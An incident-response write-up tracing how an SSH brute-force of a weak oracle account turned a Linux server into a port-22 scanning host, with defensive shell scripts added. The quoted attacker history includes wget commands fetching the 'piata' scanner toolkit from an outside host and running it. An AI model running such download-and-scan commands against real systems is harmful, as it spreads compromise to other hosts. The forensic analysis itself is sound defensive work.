A Complete Record of How a Linux Server Was Turned into a Zombie Host

1. It Started with the Firewall Going Down

Before I had even reached the office today I got a phone call saying the office could no longer connect to the Internet properly: the connection was extremely slow and web pages would not load. I hurried in and started looking for the cause.

A switch fault was ruled out first, since the internal LAN was working normally. Pinging the firewall appliance showed heavy packet loss. Clearly the firewall was the problem: it was overwhelmed, and its web management interface could not be logged into at all. I immediately contacted the vendor to troubleshoot remotely. After nearly three hours of analysis the conclusion was that two hosts on the internal network were sending huge volumes of TCP packets, creating 400,000 connections on the firewall almost instantly, far beyond its capacity, so it could no longer service normal routing requests. Let us call these two machines A and B. Once both were disconnected the network immediately returned to normal and the firewall's connection count quickly dropped back to its usual level.

Host A was configured as follows:

OS - RedHat Enterprise Linux Server release 6.x
Deployed software - Tomcat, sshd, Oracle
RAM - 8GB
CPU - Intel Core i3-2130
IP address - 172.16.111.22

Host B is a customer's colocated machine; its exact configuration is not known.

This write-up analyses and handles host A only.

Capturing traffic from the firewall's command-line interface showed host A frantically scanning port 22 across a block of IP addresses. Here is an excerpt from the capture:

proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208[REPLY] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208[REPLY] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22, packet=3, bytes=208[REPLY] 183.58.99.125:22=====>59.46.161.39:54932, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22, packet=3, bytes=208[REPLY] 183.58.99.135:22=====>59.46.161.39:60333, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22, packet=3, bytes=208[REPLY] 183.58.99.136:22=====>59.46.161.39:52737, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22, packet=3, bytes=208[REPLY] 183.58.99.137:22=====>59.46.161.39:52291, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22, packet=3, bytes=208[REPLY] 183.58.99.138:22=====>59.46.161.39:46183, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22, packet=3, bytes=208[REPLY] 183.58.99.139:22=====>59.46.161.39:36864, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22, packet=3, bytes=208[REPLY] 183.58.99.133:22=====>59.46.161.39:34515, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22, packet=3, bytes=208[REPLY] 183.58.99.134:22=====>59.46.161.39:57121, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22, packet=3, bytes=208[REPLY] 183.58.99.140:22=====>59.46.161.39:37830, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22, packet=3, bytes=208[REPLY] 183.58.99.141:22=====>59.46.161.39:42742, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22, packet=3, bytes=208[REPLY] 183.58.99.142:22=====>59.46.161.39:55018, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22, packet=3, bytes=208[REPLY] 183.58.99.143:22=====>59.46.161.39:46447, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22, packet=3, bytes=208[REPLY] 183.58.99.147:22=====>59.46.161.39:51039, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22, packet=3, bytes=208[REPLY] 183.58.99.146:22=====>59.46.161.39:33123, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22, packet=3, bytes=208[REPLY] 183.58.99.151:22=====>59.46.161.39:35956, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22, packet=3, bytes=208[REPLY] 183.58.99.145:22=====>59.46.161.39:45002, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22, packet=3, bytes=208[REPLY] 183.58.99.150:22=====>59.46.161.39:54711, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22, packet=3, bytes=208[REPLY] 183.58.99.155:22=====>59.46.161.39:58976, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22, packet=3, bytes=208[REPLY] 183.58.99.157:22=====>59.46.161.39:37967, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22, packet=3, bytes=208[REPLY] 183.58.99.158:22=====>59.46.161.39:47125, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22, packet=3, bytes=208[REPLY] 183.58.99.156:22=====>59.46.161.39:35028, packet=0, bytes=0

It is plain to see that the zombie's scanning program was hammering port 22 across an entire subnet.
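Rather than reading the session table by eye, the same pattern can be flagged automatically: one source opening sessions to many distinct addresses on a single port. The script below is an added example, not something from the original incident or from the firewall vendor. The session lines are constructed in the layout of the excerpt above, and the port and threshold are assumptions.

```shell
#!/bin/sh
# Added example (not from the original write-up): flag internal hosts that open
# sessions to many distinct destinations on one port, the pattern visible in the
# firewall session table above. Sample lines are constructed in the same layout
# as the excerpt; the port and the threshold are assumptions.

# Constructed session-table sample: one host fans out to port 22 on several
# addresses (one of them repeated), another host makes a single HTTPS session.
SAMPLE_SESSIONS='proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22, packet=3, bytes=208[REPLY] 183.58.99.130:22=====>59.46.161.39:39895, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:33967, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22, packet=3, bytes=208[REPLY] 183.58.99.132:22=====>59.46.161.39:34117, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:40011=====>183.58.99.131:22, packet=3, bytes=208[REPLY] 183.58.99.131:22=====>59.46.161.39:40011, packet=0, bytes=0
proto=6 TCP TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.50:51000=====>203.0.113.10:443, packet=12, bytes=1540[REPLY] 203.0.113.10:443=====>59.46.161.39:51000, packet=10, bytes=3200'

# scan_report PORT THRESHOLD
#   Reads session-table lines on stdin and prints "SRC_IP DISTINCT_DST_COUNT"
#   for every source that reached at least THRESHOLD distinct destination
#   addresses on PORT. Destinations are counted once per source, so a busy but
#   legitimate client talking to one server is not reported.
scan_report() {
    port="$1"; threshold="$2"
    awk -v port="$port" -v thr="$threshold" '
        {
            # The forward flow is the first "A:p=====>B:q" pair on the line;
            # the [REPLY] flow that follows is ignored.
            if (match($0, /[0-9.]+:[0-9]+=====>[0-9.]+:[0-9]+/)) {
                flow = substr($0, RSTART, RLENGTH)
                split(flow, ends, "=====>")
                split(ends[1], src, ":")
                split(ends[2], dst, ":")
                if (dst[2] == port) {
                    key = src[1] SUBSEP dst[1]
                    if (!(key in seen)) { seen[key] = 1; n[src[1]]++ }
                }
            }
        }
        END {
            for (s in n) if (n[s] >= thr) printf "%s %d\n", s, n[s]
        }' | sort
}

# Usage: save the live session table from the firewall CLI to a file and run
#   scan_report 22 20 < sessions.txt
# Here the constructed sample is used, with a low threshold so it triggers.
printf '%s\n' "$SAMPLE_SESSIONS" | scan_report 22 3
```

With a real capture the threshold should be far higher than three; a legitimate administration host may open a handful of SSH sessions, but nothing normal reaches hundreds of distinct addresses on port 22 in a short window.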

2. How to Trace the Intruder's Activity

On a Linux host, the main basis for analysis and response after an incident is the logs. /var/log/messages and /var/log/secure are essential targets, followed by the .bash_history command record. An attacker who logs into the host inevitably leaves entries in the logs. A skilled attacker might erase those traces, but most intruders today are opportunists running ready-made tools with little technical background. This host exposed three listening TCP ports:

22 sshd
80 Tomcat
1521 Oracle

Any of the three services could have had a vulnerability that was exploited, but the one most often hit by scanning attacks is sshd, through guessed usernames and passwords. So the first thing to analyse was the /var/log/secure log, to review the login history.

3. Analysis of the Compromise

3.1 The oracle account's password was brute-forced

Analysing /var/log/secure was a shock: the log had already grown to four files, each full of login attempts. Running the command:

cat secure-20150317 | grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq

gives the following:

invalid user admin
invalid user dacx
invalid user details3
invalid user drishti
invalid user ferreluque
invalid user git
invalid user hall
invalid user jparksu
invalid user last
invalid user patrol
invalid user paul
invalid user pgadmin
invalid user postgres
invalid user public
invalid user sauser
invalid user siginspect
invalid user sql
invalid user support
invalid user sys
invalid user sysadmin
invalid user system
invalid user taz
invalid user test
invalid user tiptop
invalid user txl5460
invalid user ubnt
invalid user www
mysql from 10.10.10.1
oracle from 10.10.10.1
root from 10.10.10.1

The attack program kept trying different accounts and passwords. Then, near the end of the file, the following two lines show that it succeeded.

Mar 9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
Mar 9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)

So the oracle account's password was guessed and the attacker logged into the system successfully.
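The cut -f 9,10,11 pipeline above only happens to work because the "invalid user X" form and the "X from IP" form place the user and address in different columns, which is why its output mixes "invalid user admin" with "mysql from 10.10.10.1". The script below is an added example, not part of the original investigation: it extracts the user and source address by pattern rather than by column, counts failures per source, and reports any accepted login from a source that had already failed at least N times, the exact sequence that gave the oracle compromise away. The log lines are constructed (the accepted-login line mirrors the one quoted above); the failure threshold is an assumption.

```shell
#!/bin/sh
# Added example (not from the original write-up): pick out the "brute force,
# then success" sequence from sshd entries in /var/log/secure. The sample lines
# are constructed (the Accepted line mirrors the one quoted in the write-up);
# the threshold is an assumption.

SAMPLE_SECURE='Mar  9 20:31:02 localhost sshd[30101]: Failed password for invalid user admin from 10.10.10.1 port 55012 ssh2
Mar  9 20:31:40 localhost sshd[30120]: Failed password for invalid user postgres from 10.10.10.1 port 55100 ssh2
Mar  9 20:33:15 localhost sshd[30233]: Failed password for root from 10.10.10.1 port 56001 ssh2
Mar  9 20:34:58 localhost sshd[30360]: Failed password for oracle from 10.10.10.1 port 56880 ssh2
Mar  9 20:35:30 localhost sshd[30379]: Accepted password for oracle from 10.10.10.1 port 56906 ssh2
Mar  9 20:35:30 localhost sshd[30379]: pam_unix(sshd:session): session opened for user oracle by (uid=0)
Mar  9 21:02:11 localhost sshd[30502]: Failed password for invalid user test from 198.51.100.9 port 41002 ssh2
Mar  9 21:10:45 localhost sshd[30611]: Accepted publickey for deploy from 192.0.2.7 port 50211 ssh2'

# failed_by_source: failed password attempts per source address, most first.
# The address is cut out by pattern, so the "invalid user" prefix does not
# shift it the way a fixed column number does.
failed_by_source() {
    awk '/sshd\[[0-9]+\]: Failed password for / {
            ip = $0; sub(/.* from /, "", ip); sub(/ port .*/, "", ip)
            n[ip]++
        }
        END { for (ip in n) printf "%d %s\n", n[ip], ip }' | sort -rn
}

# brute_force_then_success THRESHOLD
#   Prints "IP USER FAILS" for every accepted login whose source address had
#   already failed at least THRESHOLD times earlier in the log. Failures after
#   the success are not counted, so the number reflects what preceded the login.
brute_force_then_success() {
    awk -v thr="$1" '
        /sshd\[[0-9]+\]: Failed password for / {
            ip = $0; sub(/.* from /, "", ip); sub(/ port .*/, "", ip)
            fails[ip]++
        }
        /sshd\[[0-9]+\]: Accepted (password|publickey) for / {
            user = $0; sub(/.*Accepted (password|publickey) for /, "", user); sub(/ from .*/, "", user)
            ip = $0;   sub(/.* from /, "", ip);   sub(/ port .*/, "", ip)
            if (fails[ip] >= thr) printf "%s %s %d\n", ip, user, fails[ip]
        }'
}

# Usage on a live host: brute_force_then_success 3 < /var/log/secure
# (older rotated files, secure-YYYYMMDD, can be concatenated in front of it).
printf '%s\n' "$SAMPLE_SECURE" | failed_by_source
printf '%s\n' "$SAMPLE_SECURE" | brute_force_then_success 3
```

The second function is the one worth scheduling: a source that fails a few dozen times and is then accepted is almost never a legitimate user mistyping a password, and it is exactly the event that would have revealed the oracle login on 9 March long before the firewall fell over.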

3.2 Reconstructing the Attacker's Actions

Now let us see what the attacker did with the oracle account. First, make a copy of oracle's command history so that later activity does not overwrite the record.

cp /home/oracle/.bash_history hacker_history
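A plain cp captures the content but drops the file's modification time and gives no way to show later that the copy is unaltered. Below is the same step done the way a forensic handover expects, as an added example that is not part of the original write-up: timestamps preserved, the copy made read-only, and a manifest line recording the SHA-256 and size. The paths and the sample history content are constructed.

```shell
#!/bin/sh
# Added example (not from the original write-up): preserve a history file as
# evidence before investigating further. Keeps timestamps (cp -p), makes the
# copy read-only and writes a manifest with the SHA-256 and size so the copy
# can later be shown to be unaltered. Paths and sample content are constructed.

# file_sha256 FILE: print the hex digest only (coreutils sha256sum, or shasum
# where that is not available).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# preserve_evidence SRC DEST_DIR
#   Copies SRC into DEST_DIR with its timestamps kept and mode 0400, appends
#   "sha256  size  source_path" to DEST_DIR/MANIFEST and prints the digest.
preserve_evidence() {
    src="$1"; dest_dir="$2"
    copy="$dest_dir/$(basename "$src")"
    mkdir -p "$dest_dir"
    cp -p "$src" "$copy"
    chmod 0400 "$copy"
    digest="$(file_sha256 "$copy")"
    printf '%s  %s  %s\n' "$digest" "$(wc -c < "$copy" | tr -d ' ')" "$src" >> "$dest_dir/MANIFEST"
    printf '%s\n' "$digest"
}

# Demonstration on a constructed history file in a temporary directory. On the
# real host the source would be /home/oracle/.bash_history and the destination
# a directory on separate media, not under the attacker-writable home.
demo_dir="$(mktemp -d)"
printf 'w\nps x\nfree -m\n' > "$demo_dir/.bash_history"
preserve_evidence "$demo_dir/.bash_history" "$demo_dir/evidence"
cat "$demo_dir/evidence/MANIFEST"
```

Note that .bash_history is only written when the shell exits, so an attacker session still open at the time of the copy has not yet been recorded; that is one more reason to take the copy before changing the password or killing processes.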

Then review this file. I have annotated what the attacker was after next to each command.

1 vi .bash_profile
2 vi .bash_profile (views .bash_profile to inspect the variable settings; adds /home/oracle/bin to PATH)
3 ll
4 cd /
5 vi .bash_profile
6 vi .bash_profile (executes it to set the environment variables)
7 w
8 ps x (lists the running processes)
9 free -m (checks the memory size)
10 uname -a (checks the kernel and system version)
11 cat /etc/issue (checks the distribution release)
12 cat /etc/hosts (looks for other hosts on the internal network)
13 cat /proc/cpuinfo (checks the CPU model)
14 cat .bash_history (reviews the oracle account's command history)
15 w (checks the system load)
16 ls -a (lists hidden files under /home/oracle/)
17 passwd (changes the oracle account's password)
18 exit
19 ls
20 oracle
21 sqlplus (runs sqlplus)
22 su (tries to switch to the root account)
23 app1123456 (a guess at the root password)
24 ls
25 su -
26 w
27 free -m
28 php -v (checks the PHP version)
29 exit
30 w
31 free -m
32 php -v
33 ps aux
34 ls -a
35 exit
36 w
37 free -m
38 php -v
39 cat bash_his (looks at the command history)
40 cat bash_history
41 cat .bash_history
42 wget scriptcoders.ucoz.com/piata.tgz (downloads the zombie attack toolkit)
43 tar zxvf piata.tgz (extracts the package)
44 rm -rf piata.tgz (deletes the archive)
45 cd piata/ (enters the attack-tool directory)
46 ls -a
47 chmod +x *
48 ./a 210.212 (runs the attack tool)
49 screen (tries to run screen; finding it is not installed, downloads it)
50 ls -a
51 wget scriptcoders.ucoz.com/screen.tgz
52 tar zxvf screen.tgz (extracts it)
53 ./screen
54 exit
55 w
56 ps x
57 cd piata/ (enters the attack-tool directory)
58 ls -a
59 cat vuln.txt (views the attack results)
60 ls -a
61 mv vuln.txt 1.txt (saves the attack results)
62 ./screen -r
63 nano 1.txt (views the results file)
64 w
65 ps x
66 exit
67 cd piata
68 ps x
69 ls -a
70 nano 2.txt
71 exit
72 w
73 ps x
74 cd piata/
75 ls -a
76 cat
77 mv vuln.txt 2.txt (saves the results)
78 nano 2.txt
79 w
80 ps x
81 cd piata/
82 ls- a
83 cat vuln.txt
84 rm -rf vuln.txt
85 ./screen -r
86 exit
87 w
88 ps x
89 cd piata/
90 ls -a
91 cat vuln.txt
92 ls -a
93 mv vuln.txt 3.txt (saves the results)
94 nano 3.txt
95 exit
96 w
97 ps x
98 cd piata/
99 ls -a
100 cat vuln.txt
101 rm -rf vuln.txt
102 exit
103 w
104 ps x
105 cd piata/
106 ls -a
107 cat vuln.txt
108 rm -rf vuln.txt
109 rm -rf 1.txt
110 rm -rf 2.txt
111 rm -rf 2.txt.save
112 rm -rf 3.txt
113 screen -r
114 ./screen -r
115 exit
116 w
117 ps x
118 cd piata/
119 ls -a
120 cat vuln.txt
121 ls -a
122 nano vuln.txt
123 rm -rf vuln.txt
124 screen -r
125 ./screen -r
126 exit
127 w
128 ps x
129 cd piata/
130 ls -a
131 cat vuln.txt
132 nano vuln.txt
133 w
134 ls -a
135 rm -rf vuln.txt
136 screen -r
137 ./screen -r
138 exit
139 w
140 ps x
141 cd piata/
142 ls -a
143 cat vuln.txt
144 rm -rf vuln.txt
145 ps x
146 ls -a
147 ./screen -r
148 exit
149 w
150 ps x
151 cd piata/
152 ls -a
153 cat vuln.txt
154 nano vuln.txt
155 w
156 rm -rf vuln.txt
157 ./screen -r
158 exit

3.3 A Look at the Attack Tools

The command history shows that the attack toolkit is the package named piata. Let us pull it down and take a look at what it really is.

[root@localhost piata]# ll
total 1708
-rw-r--r--. 1 oracle oinstall 0 Mar 10 13:01 183.63.pscan.22
-rwxr-xr-x. 1 oracle oinstall 659 Feb 2 2008 a
-rwxr-xr-x. 1 oracle oinstall 216 May 18 2005 auto
-rwxr-xr-x. 1 oracle oinstall 283 Nov 25 2004 gen-pass.sh
-rwxr-xr-x. 1 oracle oinstall 93 Apr 19 2005 go.sh
-rwxr-xr-x. 1 oracle oinstall 3253 Mar 5 2007 mass
-rwxr-xr-x. 1 oracle oinstall 12671 May 18 2008 pass_file
-rwxr-xr-x. 1 oracle oinstall 21407 Jul 22 2004 pscan2
-rwxr-xr-x. 1 oracle oinstall 249980 Feb 13 2001 screen
-rw-r--r--. 1 oracle oinstall 130892 Feb 3 2010 screen.tgz
-rwxr-xr-x. 1 oracle oinstall 453972 Jul 13 2004 ss
-rwxr-xr-x. 1 oracle oinstall 842736 Nov 24 2004 ssh-scan
-rw-r--r--. 1 oracle oinstall 2392 Mar 10 05:03 vuln.txt

Of these, a, auto, go.sh and gen-pass.sh are bash scripts that set the subnet to scan and invoke the scanners; pscan2 and ssh-scan are the scanning programs themselves. vuln.txt records the list of hosts that were captured as zombies.

So far no other system files have been found to have been modified by the attacker, and there is no configuration that would start the attack software automatically.

4. Hard Lessons

Although the compromised machine was only a test host and not important in itself, it brought down the firewall and with it the office's Internet access. This has to be taken seriously, and lessons drawn from it.

System account passwords must meet a minimum level of complexity. This attack succeeded solely because the oracle account's password was too simple.

Password login over sshd carries a high risk, especially when passwords are weak. Wherever feasible, disable password authentication and switch to public-key authentication.
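A quick way to check that a host actually follows these two lessons is to audit its sshd_config for the relevant directives. The script below is an added example, not from the original write-up or from OpenSSH: it reads a configuration, keeps the first value of each keyword as sshd does, and reports password authentication left on, keyboard-interactive (PAM) password prompts still possible, root login permitted, public keys disabled, or a generous MaxAuthTries. Both configurations are constructed; the MaxAuthTries limit of 3 is an assumption, only "Keyword value" syntax is handled, and only the global section before any Match block is examined.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit an sshd_config for the
# settings the lessons above call for. Weak and hardened configurations are
# constructed inline. Assumptions: "Keyword value" syntax, MaxAuthTries limit
# of 3, and only the global section (directives after the first "Match" line
# apply conditionally and are skipped).

WEAK_SSHD_CONFIG='# constructed: the settings a freshly installed host tends to keep
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
UsePAM yes'

HARDENED_SSHD_CONFIG='# constructed: key-only logins, root locked out, few guesses per connection
Port 22
Protocol 2
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
MaxAuthTries 3
UsePAM yes
Match User backup
    PasswordAuthentication yes'

# audit_sshd_config: reads an sshd_config on stdin, prints one finding per line
# and prints nothing when every checked setting is acceptable.
audit_sshd_config() {
    awk '
        /^[ \t]*(#|$)/ { next }                  # skip comments and blank lines
        { key = tolower($1); val = tolower($2) } # keywords are case-insensitive
        key == "match" { exit }                  # conditional section begins; END still runs
        !(key in cfg) { cfg[key] = val }         # first occurrence wins, as in sshd
        END {
            if (!("passwordauthentication" in cfg) || cfg["passwordauthentication"] != "no")
                print "PasswordAuthentication is not \"no\" (sshd defaults to yes when the directive is absent)"
            # With UsePAM yes, keyboard-interactive authentication lets PAM ask for a
            # password even when PasswordAuthentication is no. Newer OpenSSH names the
            # directive KbdInteractiveAuthentication; older releases use
            # ChallengeResponseAuthentication.
            kbd = ""
            if ("kbdinteractiveauthentication" in cfg) kbd = cfg["kbdinteractiveauthentication"]
            else if ("challengeresponseauthentication" in cfg) kbd = cfg["challengeresponseauthentication"]
            if (kbd != "no")
                print "ChallengeResponse/KbdInteractive authentication is not \"no\": PAM can still accept passwords"
            if (!("permitrootlogin" in cfg) || cfg["permitrootlogin"] == "yes")
                print "PermitRootLogin is \"yes\" or not set explicitly"
            if (("pubkeyauthentication" in cfg) && cfg["pubkeyauthentication"] != "yes")
                print "PubkeyAuthentication is disabled"
            if (!("maxauthtries" in cfg) || cfg["maxauthtries"] + 0 > 3)
                print "MaxAuthTries is absent or above 3"
        }'
}

# Usage on a live host: audit_sshd_config < /etc/ssh/sshd_config
# Here both constructed configurations are checked; only the weak one reports.
printf '%s\n' "$WEAK_SSHD_CONFIG" | audit_sshd_config
printf '%s\n' "$HARDENED_SSHD_CONFIG" | audit_sshd_config
```

After editing the real file, validate it with sshd -t before restarting the daemon, and keep an existing session open until a key-based login has been confirmed to work; otherwise the lock-out applies to the administrator as well.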

As a data-centre administrator you must supervise and enforce the security practices of both system administrators and software vendors. In this case every privilege on the compromised host had been handed over to the website development company, and that company paid no attention to operational security.
